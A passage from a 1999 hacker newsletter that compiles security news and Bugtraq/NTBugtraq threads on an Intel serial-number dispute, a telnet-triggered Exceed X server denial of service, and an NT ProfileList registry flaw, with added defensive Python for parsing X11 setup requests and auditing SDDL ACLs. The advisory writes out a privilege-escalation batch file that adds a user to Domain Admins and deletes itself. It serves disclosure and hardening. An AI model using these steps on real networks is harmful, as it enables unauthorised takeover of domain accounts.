        From HNN http://www.hackernews.com April 29th
       
        Intel goes after Zero Knowledge 


      contributed by Carole 
      Zero Knowledge Systems has found a way to make the
      PIII serial number, that had been hidden, visible without
      the knowledge of the computer owner. Intel, using its
       large corporate muscle, has persuaded Symantec to
       include the Zero Knowledge software as part of Norton
       AntiVirus and have it flagged as malicious code. Now
       when a Norton user visits the Zero Knowledge Web site
       the AV detection software goes off. Intel and Zero
      Knowledge are reportedly in discussions over this
      matter. 

      C|Net http://www.news.com/News/Item/0,4,35834,00.html?st.ne.fd.tohhed.ni
      ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2249416,00.html
      Intel http://www.intel.com
      Zero Knowledge Systems http://www.zks.net/
      
      
      C|Net;
      
       Intel still wrestling serial number debacle 
       By Reuters
       Special to CNET News.com 
       April 29, 1999, 2:40 p.m. PT 
       URL: http://www.news.com/News/Item/0,4,35834,00.html 
       
       Intel, the world's leading chipmaker, is still grappling with a consumer-relations
       problem that stems from its decision to embed a serial number in its Pentium III micro
       chips, according to reports.
       
       Intel in January reacted quickly to complaints from privacy advocates about the serial
       numbers by distributing software that enabled owners of computers containing
       Pentium III chips to hide the number. 
       
       But the problem has not gone away, the New York Times reported today. The newspaper 
       reported that a small Canadian software maker has found a way to make the serial number,
       that has been hidden, visible without the knowledge of the computer owner.
       
       The problem is not new. On March 10, Montreal-based Zero-Knowledge developed an ActiveX 
       control that retrieved the serial number under certain circumstances, even after a software
       repair released by Intel disabled the feature and ostensibly "hid" the number from prying eyes. 
       
       Then, on March 19, antivirus software firm Symantec announced it would provide "detection and 
       elimination" of the Pentium III hack from Zero-Knowledge on its Web site for download. Symantec
       also said it would be part of its regular weekly virus definitions.  
       
       The Times report, however, seems to indicate that a war of words has continued to linger over 
       the issue. 
       
       Intel has reacted by persuading Symantec to include the Zero-Knowledge program on its list of 
       malicious programs. Consequently, users who visit the Zero-Knowledge site get a warning that the
       program is a virus.
       
        Zero-Knowledge executives have said that Intel has unfairly portrayed it as outlaws, the newspaper
       said.
       
       The issue of the serial number has been a volatile one for Intel because privacy advocates have 
       said the serial number allows direct marketers and data-mining companies to track the patterns of
       Web surfers. They also say it is a poor way to protect against theft, the initial purpose of the 
       serial number.
       
       An Intel spokesman said the company has been discussing the vulnerability of the serial number 
       with Zero-Knowledge executives, the newspaper reported.
       
       News.com's Michael Kanellos contributed to this report. 
       
        Story Copyright (c) 1999 Reuters Limited. All rights reserved. 
       
       @HWA
       
 38.0  NT-Exceed DoS
       ~~~~~~~~~~~~~
       
       Date: Tue, 27 Apr 1999 13:29:26 -0700
       From: "LaFournaise, Chris J." <cjlafournaise@ESCOCORP.COM>
       To: BUGTRAQ@netspace.org
       Subject: NT/Exceed D.O.S.
       
       This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
       running on Windows NT.  I haven't tested Win95/98.
       
       The Exceed X server allows inbound TCP connections on port 6000 from the XDM
       host.  If someone uses telnet from the XDM host to connect to a PC running
       Exceed on port 6000 and enters any garbage text, the X server will hang and
       the Exceed session is frozen for good.
       
       I have notified Hummingbird via their tech support web site but have not
       received a response yet.
       
       Chris LaFournaise
       cjlafournaise@escocorp.com
       
       ----------------------------------------------------------------------------
       
       Date: Wed, 28 Apr 1999 23:34:26 +0100
       From: Steve <steve@STANDAY.KEBLE.OX.AC.UK>
       To: BUGTRAQ@netspace.org
       Subject: Re: NT/Exceed D.O.S.
       
       > This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
       > running on Windows NT.  I haven't tested Win95/98.
       >
       > The Exceed X server allows inbound TCP connections on port 6000 from the XDM
       > host.  If someone uses telnet from the XDM host to connect to a PC running
       > Exceed on port 6000 and enters any garbage text, the X server will hang and
       > the Exceed session is frozen for good.
       
        As far as I know, a variation of that bug has been present in all versions
        from the early Exceed for MS-Dos onwards.  I stumbled on it 5 years ago when
       I was a student, so I didn't know whether it was a configuration error or a
       bug.
       I don't think I managed to permanently freeze the connection then, but it
       was certainly possible to freeze it for as long as you left the telnet
       connection to port 6000 open.  If I remember correctly, it didn't use to
       be just the XDM host that could make the connection, you could freeze Exceed
        from any host.  I guess that would depend on the setting of the 'Host Access
       Control List' field.
       
       For the record, I've just tested Exceed v6 under Windows 98 and it still has
       the same effect.  I also tested setting Exceed to only allow a given machine
       to connect, and I can still freeze it by telnetting from another machine
       in another subnet...
       I didn't manage to freeze it beyond the telnet session to port 6000 though.
       
       Steve.
       
       ----------------------------------------------------------------------------
       
       Date: Thu, 29 Apr 1999 09:23:11 -0600
       From: Max Norris <pedhrm.mnorris@STATE.UT.US>
       To: BUGTRAQ@netspace.org
       Subject: Re: NT/Exceed D.O.S.
       
       I wasn't able to duplicate a mini-DOS running eXceed 6.0.2.0 on NT 4.0 SP4.
       
       Steps:
       On NT machine, opened xterm session
        Went to the box that I just opened the session with, typed in TELNET <my_ip_addr> 6000
       The eXceed program hung for about 2 minutes as the host tried to connect to it, but everything else still worked in NT.
       After attempting to connect, it will say it is connected for about 2 seconds and then states "Connection closed by foreign
       host".
       After that the eXceed session resumed and I was able to close out gracefully.
       
       Max Norris
       pedhrm.mnorris@state.ut.us
       
       >>> "LaFournaise, Chris J." <cjlafournaise@ESCOCORP.COM> 04/27 2:29 PM >>>
       This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
       running on Windows NT.  I haven't tested Win95/98.
       
       The Exceed X server allows inbound TCP connections on port 6000 from the XDM
       host.  If someone uses telnet from the XDM host to connect to a PC running
       Exceed on port 6000 and enters any garbage text, the X server will hang and
       the Exceed session is frozen for good.
       
       I have notified Hummingbird via their tech support web site but have not
       received a response yet.
       
       Chris LaFournaise
       cjlafournaise@escocorp.com
       
       ----------------------------------------------------------------------------
       
       Date: Wed, 28 Apr 1999 17:39:00 -0700
       From: Ian Westcott <rakarra@PACBELL.NET>
       To: BUGTRAQ@netspace.org
       Subject: Re: NT/Exceed D.O.S.
       
       On Tue, Apr 27, 1999 at 01:29:26PM -0700, LaFournaise, Chris J. wrote:
       > This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
       > running on Windows NT.  I haven't tested Win95/98.
       >
       > The Exceed X server allows inbound TCP connections on port 6000 from the XDM
       > host.  If someone uses telnet from the XDM host to connect to a PC running
       > Exceed on port 6000 and enters any garbage text, the X server will hang and
       > the Exceed session is frozen for good.
       
       I just tested Exceed v6.0 under Win95, and it is vulnerable.
       --
       
            Ian Westcott      | Fly away to a Rainbow in the sky.
       ijwestcott@ucdavis.edu | Gold is at the end for each of us to find.
            -==(UDIC)==-      | There the road begins where another one will end.
       Rakarra@FurryMUCK, IRC | Here the four winds know,
        Dragon Code: DC.D f+  | Who will break and who will bend.
        s- h- Cgold>Red a $   | All to be the Master of the Wind.
       
       ----------------------------------------------------------------------------
       
       Date: Wed, 28 Apr 1999 13:57:51 -0700
       From: Matt Wilbur <matt@PHOTON.COM>
       To: BUGTRAQ@netspace.org
       Subject: Re: NT/Exceed D.O.S.
       
       Exceed (an X server, not an X emulator) version 6.0.1.0 on NT appears to
       have fixed this problem, somewhat...
       
       Telnetting to port 6000 locks the server up for 20-30 seconds, but it
       recovers eventually.  Not surprisingly, using netcat has the same effect...
       although, contrary to Chris's findings with Exceed 5, I didn't need to send
       any garbage characters, the connection alone did the job.  Also, it works
        from any host, not just the one the xdm session had been initiated with,
       regardless of host access settings in Xconfig, Exceeds "configuration" tool.
       
       
       I'd still consider this DoS-bait, when you imagine a one-liner to
       continuously connect to port 6000 of your favorite Exceed user's machine.
       
       Matt Wilbur
       
       [snip]
       >
       > This is regarding Hummingbird's Exceed X emulator v5 (and possibly v6)
       > running on Windows NT.  I haven't tested Win95/98.
       >
        > The Exceed X server allows inbound TCP connections on port 6000 from the XDM
        > host.  If someone uses telnet from the XDM host to connect to a PC running
        > Exceed on port 6000 and enters any garbage text, the X server will hang and
        > the Exceed session is frozen for good.
       >
       > I have notified Hummingbird via their tech support web site
       > but have not received a response yet.
       >
       > Chris LaFournaise
       > cjlafournaise@escocorp.com
       >
       
       ----------------------------------------------------------------------------
       
       Date: Thu, 29 Apr 1999 11:54:14 -0700
       From: Jamie Lawrence <jal@THIRDAGE.COM>
       To: BUGTRAQ@netspace.org
       Subject: Re: NT/Exceed D.O.S.
       
       I couldn't reproduce either effect with Exceed 6.1 under NTsp3.
       Everything behaved normally, both for new and existing sessions.
       
       -j
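        What the thread is probing is the X server's handling of the connection setup
        request on port 6000: a server that blocks waiting for a well-formed header from
        an unauthenticated peer is hung for as long as the telnet session stays open,
        and garbage typed into that session never becomes a valid header. As an added
        example, not code from Hummingbird or from any poster in the thread, the Python
        below parses the setup request as the X protocol defines it and shows the two
        defensive decisions a server should make: reject on the first byte as soon as it
        cannot be a byte-order marker, and report exactly how many more bytes are needed
        so the caller can apply a read deadline instead of waiting forever.
        MAX_SETUP_BYTES and the sample authorization data are assumptions.

```python
import struct

X_PROTOCOL_MAJOR = 11
# Assumption for this example: an upper bound on the setup request (12-byte
# header plus authorization name and data) that the server is willing to buffer
# from an unauthenticated client.  Real auth data is a few dozen bytes.
MAX_SETUP_BYTES = 1024


class SetupError(ValueError):
    """The bytes received cannot be an X11 connection setup request."""


def pad4(n):
    return (4 - n % 4) % 4


def parse_setup(buf):
    """Parse an X11 connection setup request.

    Layout (X Window System Protocol, "Connection Setup"):
      1  byte-order: 'B' (0x42) MSB first or 'l' (0x6C) LSB first
      1  unused
      2  protocol-major-version    2  protocol-minor-version
      2  n = length of auth-protocol-name    2  d = length of auth-protocol-data
      2  unused
      n  auth-protocol-name, then pad(n)    d  auth-protocol-data, then pad(d)

    Returns ("accept", info) when a complete, well-formed request is present,
    ("wait", total_needed) when the prefix is valid but incomplete, and raises
    SetupError as soon as the data cannot be a setup request.  The byte-order
    byte is checked before anything else, so "hello" typed into telnet is
    refused on its first byte instead of being buffered in the hope that a
    header will follow."""
    if not buf:
        return ("wait", 12)
    order = buf[0]
    if order == 0x42:
        fmt = ">"
    elif order == 0x6C:
        fmt = "<"
    else:
        raise SetupError("bad byte-order byte 0x%02x" % order)
    if len(buf) < 12:
        return ("wait", 12)
    major, minor, nlen, dlen = struct.unpack(fmt + "xxHHHHxx", buf[:12])
    if major != X_PROTOCOL_MAJOR:
        raise SetupError("unsupported protocol version %d.%d" % (major, minor))
    total = 12 + nlen + pad4(nlen) + dlen + pad4(dlen)
    if total > MAX_SETUP_BYTES:
        raise SetupError("setup request of %d bytes exceeds limit" % total)
    if len(buf) < total:
        return ("wait", total)
    name_end = 12 + nlen
    data_start = name_end + pad4(nlen)
    info = {
        "order": "MSB" if fmt == ">" else "LSB",
        "version": (major, minor),
        "auth_name": buf[12:name_end].decode("latin-1"),
        "auth_data": bytes(buf[data_start:data_start + dlen]),
    }
    return ("accept", info)


def negotiate(chunks):
    """Feed chunks as a server would receive them; stop at the first decision.
    Returns ("accept", info), ("reject", reason) or ("wait", needed) if the
    peer went quiet, which is where the caller's read deadline must apply."""
    buf = b""
    state = ("wait", 12)
    for chunk in chunks:
        buf += chunk
        try:
            state = parse_setup(buf)
        except SetupError as e:
            return ("reject", str(e))
        if state[0] == "accept":
            break
    return state


def build_setup(order=b"l", name=b"MIT-MAGIC-COOKIE-1", data=bytes(16)):
    """Construct a well-formed setup request, as an X client library would.
    The 16 zero bytes stand in for a real cookie (constructed sample)."""
    fmt = "<" if order == b"l" else ">"
    header = order + b"\0" + struct.pack(fmt + "HHHHxx", X_PROTOCOL_MAJOR, 0, len(name), len(data))
    return header + name + b"\0" * pad4(len(name)) + data + b"\0" * pad4(len(data))


if __name__ == "__main__":
    good = build_setup()
    print(negotiate([good[:7], good[7:]]))      # accept after the second chunk
    print(negotiate([b"hello\r\n"]))             # reject on the first byte
    print(negotiate([b"l"]))                     # wait: valid prefix, needs 12 bytes
```

        A ("wait", n) result with no further data is exactly the telnet-and-do-nothing
        case from the thread; the server's only correct move there is to close the
        connection when its deadline expires, on a per-connection basis, so one idle
        peer never stalls the display for the user who is actually logged in.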
       
       
       
       @HWA       
       
 39.0  NT4 Trojaned Profiles
       ~~~~~~~~~~~~~~~~~~~~~
       
       Date: Wed, 28 Apr 1999 20:36:58 +0100
       From: Mnemonix <mnemonix@GLOBALNET.CO.UK>
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
       
       
       Problem : NT users can cause other users of the system to load a "trojaned" profile that could lead to a system compromise. This
       issue has been here for as long as NT 4 has, but I'm not sure if anybody has picked this particular issue up.
       
       Details: When a user logs onto an NT Workstation or Server a new subkey is written to the HKLM\Software\Microsoft\Windows
       NT\CurrentVersion\ProfileList registry key. The name of this new key is that of the user's Security Identifier or SID. One of
       the values of this key is the ProfileImagePath which points to the location of the user's profile directory. This can reference
       a local path (eg %systemroot%\profiles\acc_name) or a UNC path (eg \\PDC\profiles\acc_name). 
       
       By default, the permissions on the ProfileList registry key grants the Everybody group the SetValue permission meaning that any
       user including guests may edit the information in this subkey and all of its subkeys. Consequently a malicious user of the
       system could change another user's ProfileImagePath and get it to load a different profile (eg c:\trojaned-profile) that
       contains entries in the Start Up folder that will run when that user next logs on to that system. 
       
        Editing these Registry keys can be done locally or from across the network. Although remote access to the registry can be
       controlled by placing controls on the winreg key, the HKLM\Software\Microsoft\Windows NT\CurrentVersion path into the Registry
       is, by default, an AllowedPath, meaning that, irrespective of the ACLs set on the winreg key, a remote user may edit any subkey
       under the CurrentVersion key. Note that tools such as Regedit.exe and Regedt32.exe will not be able to be used to to this. The
       NT Resource Kit's reg.exe could though because it opens a handle straight to the Registry key in question.
       
        Attack Scenario: This weakness of default settings could allow a normal domain user to gain domain Administrative rights:
        Assuming the attacker's machine is called \\DODGY and the PDC is called \\PDC, the user jsmith at \\DODGY creates a new
        directory on the root of their C: drive called "profile", copies into it the contents of their own profile and then makes
        some changes, like creating a batch file called addme.bat with the following contents:
       
       net groups "Domain Admins" jsmith /add
       del "\\DODGY\C$\profile\start menu\programs\startup\addme.bat"
       
       Once they have logged onto the domain they use reg.exe to open the Administrator's ProfileList key. This is easily found as it
       is the SID with a RID of 500. They then edit the ProfileImagePath to point to \\DODGY\C$\profile . Next time the Administrator
       logs on at the \\PDC console their profile will be loaded from \\DODGY (because Domain Admins are members of the local
        Administrators group they can map to the administrative share on \\DODGY ) and the self-deleting batch file in the StartUp folder will
        be run adding jsmith to the Domain Admins group.
       
       This whole process can be cleaned up somewhat as in most cases it would be fairly obvious that something is not as it should be
       to the Administrator when they log on.
       
       Resolution: The winlogon.exe process actually creates the new subkey when a user logs on - and the key is _not_ created in the
       security context of the user currently logging on but rather the SYSTEM account. Only the SYSTEM account, then, needs write
        access to the ProfileList key and Everyone else should be given only Read Access. Doing this will not prevent new users from
        logging on and the "SID" subkey is still created.
       
       NB:- This issue can also allow users to bypass mandatory profiles etc, etc.
       
       Cheers,
       David Litchfield
       http://www.infowar.co.uk/mnemonix
       http://www.arca.com/
       
       -------------------------------------------------------------------------------------------
       
       Date: Thu, 29 Apr 1999 09:58:35 -0700
       From: Paul Leach <paulle@MICROSOFT.COM>
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
       
       > -----Original Message-----
       > From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
       > Sent: Wednesday, April 28, 1999 12:37 PM
       > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       > Subject: NT Security Advisory: Domain user to Domain Admin - Profiles
       > and the Registry
       >
       >
       > Problem : NT users can cause other users of the system to
       > load a "trojaned" profile that could lead to a system
       > compromise. This issue has been here for as long as NT 4 has,
       > but I'm not sure if anybody has picked this particular issue up.
       
       Yes, they have.
       
       The "Securing Windows NT" Whitepaper from the www.microsoft.com (just use
        the search capability for exactly the phrase in quotes) already notes that
       you must ACL the ProfileList key as you suggest.
       
       Paul
       
       -------------------------------------------------------------------------------------------
       
       Date: Thu, 29 Apr 1999 11:44:18 -0700
       From: Paul Leach <paulle@MICROSOFT.COM>
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
       
       > -----Original Message-----
       > From: Paul Leach [mailto:paulle@MICROSOFT.COM]
       > Sent: Thursday, April 29, 1999 9:59 AM
       > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       > Subject: Re: NT Security Advisory: Domain user to Domain Admin -
       > Profiles and the Registry
       >
       >
       > > -----Original Message-----
       > > From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
       > > Sent: Wednesday, April 28, 1999 12:37 PM
       > > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       > > Subject: NT Security Advisory: Domain user to Domain Admin
       > - Profiles
       > > and the Registry
       > >
       > >
       > > Problem : NT users can cause other users of the system to
       > > load a "trojaned" profile that could lead to a system
       > > compromise. This issue has been here for as long as NT 4 has,
       > > but I'm not sure if anybody has picked this particular issue up.
       >
       > Yes, they have.
       >
       > The "Securing Windows NT" Whitepaper from the
       > www.microsoft.com (just use
        > the search capability for exactly the phrase in quotes)
       > already notes that
       > you must ACL the ProfileList key as you suggest.
       
        I had misremembered that the above search got exactly one hit -- instead, it
        was the first hit on the list. The precise URL is
        http://www.microsoft.com/NTServer/security/exec/overview/Secure_NTInstall.asp
       
       Also, the SCE templates included with SP4 were designed to help automate the
       application of the recommendations in the White Paper. So if you want to
       make the fix to the ACL on Profile list, I'd suggest looking into them.
       
       Paul
       
       -------------------------------------------------------------------------------------------
       
       Date: Thu, 29 Apr 1999 11:31:23 -0700
       From: David LeBlanc <dleblanc@MICROSOFT.COM>
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
       
       > From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
       
       > Problem : NT users can cause other users of the system to
       > load a "trojaned" profile that could lead to a system
       > compromise. This issue has been here for as long as NT 4 has,
       > but I'm not sure if anybody has picked this particular issue up.
       
       I think you should search the archives on my name with ProfileList as a key,
       and that you will find a number of references.  Dominique, Paul Leach and I
       had an extended discussion on that topic in this list nearly a year ago.
       
       > By default, the permissions on the ProfileList registry key
       > grants the Everybody group the SetValue permission
       
       If I'm not mistaken, only the system account ever accesses this key.  At
       least that's what I found when auditing this tree several months ago.
       
       > Consequently a malicious
       > user of the system could change another user's
       > ProfileImagePath and get it to load a different profile (eg
       > c:\trojaned-profile) that contains entries in the Start Up
       > folder that will run when that user next logs on to that system.
       
       If we're going to start worrying about this one, this is just one of many
       modifications that need to be made.  The best collection of resources in
       this area remains (IMHO) Steve Sutton's NSA paper at www.trustedsystems.com
       
       > Editing these Registry keys can be done local or from across
       > the network.
       
       This is only true of the server.  A currently patched workstation requires
       admin access to open this portion of the registry across the network.
       However, to actually _trojan_ someone, you also must have the ability to
       insert new profiles under %systemroot%\Profiles, which is typically NOT
       available on a server.  A good solution for a server would be to make the
       permissions on the parent key admins, system, and server ops.  If the group
       of users who you expect to be logging on at the console of a server were
       more diverse, then I would recommend creating a group for just that purpose
       and setting the permissions to admins, system, and the group you
       established.
       
       So unless you're worried about a workstation with serial users, it turns out
       that the complete requirements to really carry out an attack are seldom met.
       
       > Once they have logged onto the domain they use reg.exe to
       > open the Administrator's ProfileList key. This is easily
       > found as it is the SID with a RID of 500. They then edit the
       > ProfileImagePath to point to \\DODGY\C$\profile .
       
       I would suggest that you actually try your scenarios.  I have tried this,
       and it doesn't work.  The admin will get the profile for the default user.
       The same is true if you try to point the profile anywhere else than
       %systemroot%profiles.
       
       > Resolution: The winlogon.exe process actually creates the new
       > subkey when a user logs on - and the key is _not_ created in
       > the security context of the user currently logging on but
       > rather the SYSTEM account. Only the SYSTEM account, then,
       > needs write access to the ProfileList key and Everyone else
       > should be given only Read Access. Doing this will not prevent
       > new users from logging on and they "SID" subkey is still created.
       
       I recommended doing this some months ago.  It is still not completely clear
       that this won't break something somewhere.  As always, people should try
       this in their own systems and be sure something doesn't break.  Another way
       to go at this one would be to put an app or script in the default user's
       startup group that would set the permissions to admins, system and that
       user.  I believe supercacls (also from Steve Sutton) could be used to do
       this.
       
       -------------------------------------------------------------------------------------------
       
       Date: Thu, 29 Apr 1999 12:31:21 -0700
       From: Paul Leach <paulle@MICROSOFT.COM>
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
       
       > -----Original Message-----
       > From: dan koons [mailto:dkoons@secured.net]
       > Sent: Thursday, April 29, 1999 11:52 AM
       > To: Paul Leach
       > Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       > Subject: Re: NT Security Advisory: Domain user to Domain Admin -
       > Profiles and the Registry
       >
       > strange.  i just followed your explicit instructions, grabbed
       > the first
       > file that turned up (which was called "securing windows nt
       > installation"
       > and was dated october 23, 1997) and searched it for the string
       > 'ProfileList' and was unable to find any matches.
       
       Here's a relevant section of the text, cut and paste from the doc:
       
       <quote>
       Protecting the Registry
       
       In addition to the considerations for standard security, the administrator
       of a high-security installation might want to set protections on certain
       keys in the registry.
       By default, protections are set on the various components of the registry
       that allow work to be done while providing standard-level security. For
       high-level security, you might want to assign access rights to specific
       registry keys. This should be done with caution, because programs that the
       users require to do their jobs often need to access certain keys on the
       users' behalf. For more information, see Chapter 24, "Registry Editor and
       Registry Administration."
       
       For each of the keys listed below, make the following change:
                               Access allowed
       Everyone Group  QueryValue, Enumerate Subkeys, Notify and Read Control
       
       In the HKEY_LOCAL_MACHINE on Local Machine dialog:
       \Software
               This change is recommended.  It locks the system in terms of who can
       install software.
               Note that it is not recommended that the entire subtree be locked
       using this setting
             because that can render certain software unusable.
       \Software\Microsoft\RPC (and its subkeys)
               This locks the RPC services.
       \Software\Microsoft\Windows NT\ CurrentVersion
       \Software\Microsoft\Windows NT\ CurrentVersion\Profile List
       \Software\Microsoft\Windows NT\ CurrentVersion\AeDebug
       \Software\Microsoft\Windows NT\ CurrentVersion\Compatibility
       
       <end quote>
       
       So it appears that there's a space in the spelling in the document. In the
       registry, there's no space. I'll report the bug.
       
       Perhaps all the clones of the document you cited also copied the spelling
       error :-)
       
       Paul
       
       -------------------------------------------------------------------------------------------
       
       Date: Thu, 29 Apr 1999 12:00:56 -0700
       From: dan koons <dkoons@SECURED.NET>
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
       
       On Thu, 29 Apr 1999, dan koons wrote:
       
       > further, in the "windows nt security guidelines" developed for nsa
       > research (found at http://www.trustedsystems.com/NSAGuide.htm), the united
       > states department of energy's "windows nt security advisor" (at
       > http://doe-is.llnl.gov/SecRes/CustomTools/secadvisor.pdf), the united
       > states navy's "navy secure windows nt 4.0 installation and configuration
       > guide" (at http://infosec.navy.mil/COMPUSEC/ntsecure.html), and the
       > "hardening of windows nt 4.0" (at
       > http://pw2.netcom.com/~honeyluv/index.html), a search for the string
       > 'ProfileList' also does not yield any results.
       
       oops; my mistake.  the navy guide DOES recommend setting the 'ProfileList'
       key to 'read' for 'Authenticated Users'.  but i could not find any
       reference to the key in any of the other documents.
       
       dan
       
       _____________________________________________________________________
       daniel e koons                                     dkoons@secured.net
       _____________________________________________________________________
       
       -------------------------------------------------------------------------------------------
       
       Date: Thu, 29 Apr 1999 13:35:36 -0700
       From: Paul Leach <paulle@MICROSOFT.COM>
       To: BUGTRAQ@netspace.org
       Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
       
       -----Original Message-----
        From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
       Sent: Wednesday, April 28, 1999 12:37 PM
       To: BUGTRAQ@NETSPACE.ORG
       Subject: NT Security Advisory: Domain user to Domain Admin - Profiles and
       the Registry
       
       
       Problem : NT users can cause other users of the system to load a "trojaned"
       profile that could lead to a system compromise. This issue has been here for
       as long as NT 4 has, but I'm not sure if anybody has picked this particular
       issue up.
       
       Details: When a user logs onto an NT Workstation or Server a new subkey is
       written to the HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
       registry key. The name of this new key is that of the user's Security
       Identifier or SID. One of the values of this key is the ProfileImagePath
       which points to the location of the user's profile directory. This can
       reference a local path (eg %systemroot%\profiles\acc_name) or a UNC path (eg
       \\PDC\profiles\acc_name).
       
       
       This is indeed an issue. It is documented in the "Securing Windows NT"
       whitepaper,
        http://www.microsoft.com/NTServer/security/exec/overview/Secure_NTInstall.asp
       and anyone who has implemented those recommendations will be safe against
       this vulnerability.
       (NB: The registry key is misspelled "Profile List" in the document.)
       
        Also, the SCE templates in SP4/SP5 included one designed to help automate
        the recommendations in the whitepaper -- securws4.inf, IIRC. However, we
        just examined it and it allows "Power Users" (abbreviated "PU") to write the
        key. It'll be fixed in SP6. In the meantime, one can hand edit the entry for
        ProfileList in the template. Find the line that looks like this:
        
        "MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList",2,"D:P(A;CI;GR;;;AU)(A;CI;GA;;;DA)(A;CI;GA;;;SY)(A;CI;GA;;;CO)(A;CI;GRGW;;;PU)"
        
        and get rid of the "(A;CI;GRGW;;;PU)" at the end.
       
       Paul
       
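        The template entry above is an SDDL string, so the check Paul describes (is any non-administrative trustee granted
        write access on ProfileList?) can be automated. The Python below is an added example, not code from this thread or
        from Microsoft's SCE templates: it parses the D: component of an SDDL string into ACEs, flags ALLOW entries that
        grant write-type rights to trustees outside an assumed privileged set (SY, BA, DA, LA, CO), and runs that check on
        the quoted securws4.inf line and on the same line with the Power Users ACE removed. The rights and trustee
        abbreviations follow the SDDL specification; for a registry key the object-specific codes DC and LC mean
        KEY_SET_VALUE and KEY_CREATE_SUB_KEY. The privileged set and the write-right list are this example's own choices.

```python
"""Audit an SDDL DACL string for write access granted to non-admin trustees.

Added example. The parsing rules follow Microsoft's Security Descriptor
Definition Language; the PRIVILEGED and WRITE_RIGHTS sets are assumptions
of this example, not values from the thread.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Line quoted from the SP4/SP5 securws4.inf template, as reproduced in the post.
TEMPLATE_SP4 = r'"MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList",2,"D:P(A;CI;GR;;;AU)(A;CI;GA;;;DA)(A;CI;GA;;;SY)(A;CI;GA;;;CO)(A;CI;GRGW;;;PU)"'
# The same line with the trailing Power Users ACE removed, as the post recommends.
TEMPLATE_FIXED = r'"MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList",2,"D:P(A;CI;GR;;;AU)(A;CI;GA;;;DA)(A;CI;GA;;;SY)(A;CI;GA;;;CO)"'

# SDDL two-letter rights that let a trustee change a registry key or its ACL.
# Generic: GA (all), GW (write). Standard: WD (write DAC), WO (write owner), SD (delete).
# Key-specific: KA (KEY_ALL_ACCESS), KW (KEY_WRITE); object-specific codes on a
# registry key: DC = KEY_SET_VALUE, LC = KEY_CREATE_SUB_KEY, WP = KEY_CREATE_LINK.
WRITE_RIGHTS = {"GA", "GW", "WD", "WO", "SD", "KA", "KW", "DC", "LC", "WP", "FA", "FW"}
# Bits checked when the rights field is a hex mask instead of abbreviations:
# GENERIC_WRITE, GENERIC_ALL, WRITE_DAC, WRITE_OWNER, DELETE, KEY_SET_VALUE, KEY_CREATE_SUB_KEY.
WRITE_MASK = 0x40000000 | 0x10000000 | 0x00040000 | 0x00080000 | 0x00010000 | 0x2 | 0x4
# Trustees that may legitimately hold write access to ProfileList (assumption):
# SYSTEM writes the SID subkeys at logon, administrators manage the machine.
PRIVILEGED = {"SY", "BA", "DA", "LA", "CO"}


@dataclass
class Ace:
    ace_type: str   # "A" allow, "D" deny, ...
    flags: str      # inheritance flags, e.g. "CI"
    rights: str     # concatenated two-letter codes or a hex mask
    trustee: str    # SDDL SID abbreviation or literal SID


def parse_sddl_dacl(sddl: str) -> list[Ace]:
    """Return the ACEs of the D: component of an SDDL string."""
    m = re.search(r"D:([A-Z]*)((?:\([^)]*\))*)", sddl)
    if not m:
        raise ValueError("no DACL (D:) component in SDDL string")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(2)):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        aces.append(Ace(fields[0], fields[1], fields[2], fields[5]))
    return aces


def grants_write(rights: str) -> bool:
    """True if the rights field includes any write-type right."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & WRITE_MASK)
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(codes & WRITE_RIGHTS)


def find_weak_aces(sddl: str) -> list[Ace]:
    """ALLOW ACEs that hand write rights to a trustee outside the privileged set."""
    return [a for a in parse_sddl_dacl(sddl)
            if a.ace_type == "A" and a.trustee not in PRIVILEGED and grants_write(a.rights)]


def audit_template_line(line: str) -> list[str]:
    """Audit one SCE .inf registry line of the form "key",mode,"sddl"."""
    sddl = line.rsplit(",", 1)[1].strip().strip('"')
    return [f"{a.trustee} gets {a.rights}" for a in find_weak_aces(sddl)]


if __name__ == "__main__":
    for name, line in (("SP4/SP5 template", TEMPLATE_SP4), ("corrected", TEMPLATE_FIXED)):
        weak = audit_template_line(line)
        print(f"{name}: {'WEAK: ' + ', '.join(weak) if weak else 'ok'}")
```

        Run stand-alone it reports the Power Users ACE on the template line and nothing on the corrected one; the same
        functions can be pointed at any other "MACHINE\..." line in an .inf template, or at an SDDL string exported from
        a live key, to find other keys where the Everyone or Power Users groups hold SetValue.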
       -------------------------------------------------------------------------------------------
       
